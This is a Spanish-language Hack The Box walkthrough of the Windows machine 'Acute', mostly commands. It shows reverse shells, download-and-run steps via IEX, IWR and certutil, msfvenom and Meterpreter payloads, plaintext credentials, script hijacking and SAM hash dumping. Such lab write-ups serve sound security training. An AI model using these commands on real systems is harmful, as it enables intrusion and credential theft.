Cu3rv0x
Acute

Acute


HTB Windows

nmap -A -p- -oA acute 10.10.11.145 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA acute 10.10.11.145

nmap -sU -O -p- -oA acute-udp 10.10.11.145

ping -c 1 10.10.11.145

ssh_command.

nmap -p- --open -T5 -v -n 10.10.11.145

echo "10.10.11.145 acute.htb atsserver.acute.local" | sudo tee -a /etc/hosts

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.145 -oG allPorts

ssh_command.

extractPorts allPorts

ssh_command.

nmap -sCV -p443 10.10.11.145 -oN targeted

ssh_command.

bc targeted -l rb

whatweb https://10.10.11.145

ssh_command.

ssh_command.

Nos dirigimos a https://atsserver.acute.local

ssh_command.

whatweb https://atsserver.acute.local

ssh_command. Vamos a la pagina llamada about us y copiamos los nombres

Con vim hacemos lo siguiente para reemplazar las comas

:%s/,/\r/g

:%s/^ *//

cat users.txt

ssh_command.

Click en New Starter Forms

ssh_command.

libreoffice New_Starter_CheckList_v7.docx

ssh_command.

Parece que encontramos una credencial, Password1!

ssh_command.

ssh_command.

Le damos click a remote

ssh_command.

Nos manda a https://atsserver.acute.local/Acute_Staff_Access/en-US/logon.aspx

ssh_command.

exiftool New_Starter_Checklist_v7.docx

ssh_command.

ssh_command.

Le damos click en submit

ssh_command.

whoami /priv

ssh_command.

whoami /all

ssh_command.

https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

Agregamos lo siguiente al final de Invoke-PowershellTcp.ps1

Que consiste en la ip de tu maquina kali y el puerto donde vas a escuchar

ssh_command.

rlwrap nc -nlvp 443

python -m http.server 80

ssh_command.

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7/Invoke-PowerShellTcp.ps1')

ssh_command.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.7 LPORT=443 -f exe -o shell.exe

ssh_command.

python -m http.server 80

ssh_command.

IWR -uri http://10.10.14.7/shell.exe -OutFile shell.exe

ssh_command.

.\shell.exe

ssh_command.

wget https://www.nirsoft.net/utils/nircmd-x64.zip

unzip nircmd-x64.zip

ssh_command.

python -m http.server 80

certutil -urlcache -f http://10.10.14.7/nircmd.exe nircmd.exe

ssh_command.

sudo msfdb run

use exploit/multi/handler

set payload windows/x64/meterpreter_reverse_tcp

set LHOST 10.10.14.7

set PORT 443

run

ssh_command.

python -m http.server 80

ssh_command.

IWR -uri http://10.10.14.7/reverse.exe -OutFile reverse.exe

ssh_command.

.\reverse.exe

getuid

sysinfo

screenshot

screenshare -q 100 -d 5000

ssh_command.

ssh_command.

Credenciales imonks:W3_4r3_th3_f0rce.

$passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential("ACUTE\imonks", $passwd)

Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock {whoami /priv}

ssh_command.

ssh_command.

Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock {type C:\users\imonks\desktop\user.txt}

ssh_command.

Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock {type C:\users\imonks\desktop\wm.ps1}

ssh_command.

Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock {((Get-Content C:\users\imonks\desktop\wm.ps1 -Raw) -Replace 'Get-Volume', 'cmd.exe /c C:\Utils\shell.exe' | Set-Content -Path C:\Users\imonks\Desktop\wm.ps1}

ssh_command.

rlwrap nc -nlvp 443

ssh_command.

ssh_command.

whoami /priv

ssh_command.

net localgroup Administrators

ssh_command.

reg save HKLM\SAM sam.backup

reg save HKLM\SYSTEM system.backup

ssh_command.

sudo msfdb run

use exploit/multi/handler

set payload windows/x64/meterpreter_reverse_tcp

set LHOST 10.10.14.7

set PORT 443

run

ssh_command.

reverse.exe

hashdump

ssh_command.

secretsdump.py -sam sam.backup -system system.backup LOCAL

ssh_command.

a29f7623fd11550def0192de9246f46b:Password@123

ssh_command.

$passwd = ConvertTo-SecureString "Password@123." -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential("ACUTE\awallace", $passwd)

Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock {whoami /priv}

ssh_command.

Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock {type C:\PROGRA~1\keepmeon\keepmeon.bat}

ssh_command.

Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock {net group /domain}

ssh_command.

Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock {net group Site_Admin /domain}

ssh_command.

Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock {Set-Content C:\PROGRA~1\keepmeon\pawned.bat -Value 'net group Site_Admin' /domain /add}

ssh_command.

Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock { net user awallace /domain}

ssh_command.

Invoke-Command -ComputerName ATSSERVER -Credential $cred -ConfigurationName dc_manage -Scriptblock {type C:\Users\Administrator\Desktop\root.txt}

ssh_command.

© 2024 Cu3rv0x